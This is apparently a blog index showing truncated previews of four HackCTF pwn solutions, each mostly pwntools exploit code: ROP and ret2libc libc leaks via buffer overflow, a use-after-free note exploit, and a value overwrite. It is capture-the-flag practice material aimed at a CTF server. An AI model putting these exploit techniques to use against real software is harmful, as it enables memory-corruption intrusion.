youngsouk
youngsouk
[hackctf]ROP
from pwn import * #p = process('./rop') p = remote('ctf.j0n9hyun.xyz', 3018) e = ELF('./rop') #lib = e.libc lib = ELF("libc.so.6") context.log_level = "debug" ppp_r = 0x08048509 main = 0x08048470 payload = 'a' * 0x88 + 'b' * 4 payload += p32(e.plt['write']) + p32(ppp_r) + p32(1) + p32(e.got['write']) + p32(4) payload += p32(main) p.sendline(payload) libc = u32(p.recv(4)) - lib.sym['write'] log.i..
[hackctf] uaf
from pwn import * #p = process('./uaf') p = remote('ctf.j0n9hyun.xyz', 3021) context.log_level="debug" def add_note(size, content): p.recv() p.sendline('1') p.recv() p.sendline(size) p.recv() p.sendline(content) def del_note(index): p.recv() p.sendline('2') p.recv() p.sendline(index) def p_note(index): p.recv() p.sendline('3') p.recv() p.sendline(index) magic = 0x08048986 add_note('100','') add_..
[hackctf]RTL-Core
from pwn import * #p = process('./rtlcore') p = remote('ctf.j0n9hyun.xyz', 3011) e = ELF('./rtlcore') #lib = e.libc lib = ELF('./libc.so.6') context.log_level="debug" p.recv() payload = p32(0xC0D9B0A7) + '\x00' * 50 p.sendline(payload) p.recvuntil('\xa1\x9c\x20') libc = int(p.recv(10), 16) - lib.sym['printf'] p.recv() pause() log.info('libc : ' + hex(libc)) payload = 'a' * (0x3e + 4) payload += ..
[hack-ctf]poet
from pwn import * #p = process('./poet') p = remote('ctf.j0n9hyun.xyz', 3014) context.log_level="debug" reward = 0x00000000004007E6 p.recv() payload = 'a' * 0x40 + p64(1000000) p.sendline(payload) p.recv() pause() p.sendline(payload) p.interactive() bof 터뜨려서 값을 정확히 1000000으로 바꾸면 된다. 다만 첫번째에 입력받은 뒤 초기화가 되기때문에 2번째에 입력받을 때 다시 넣어주어야한다.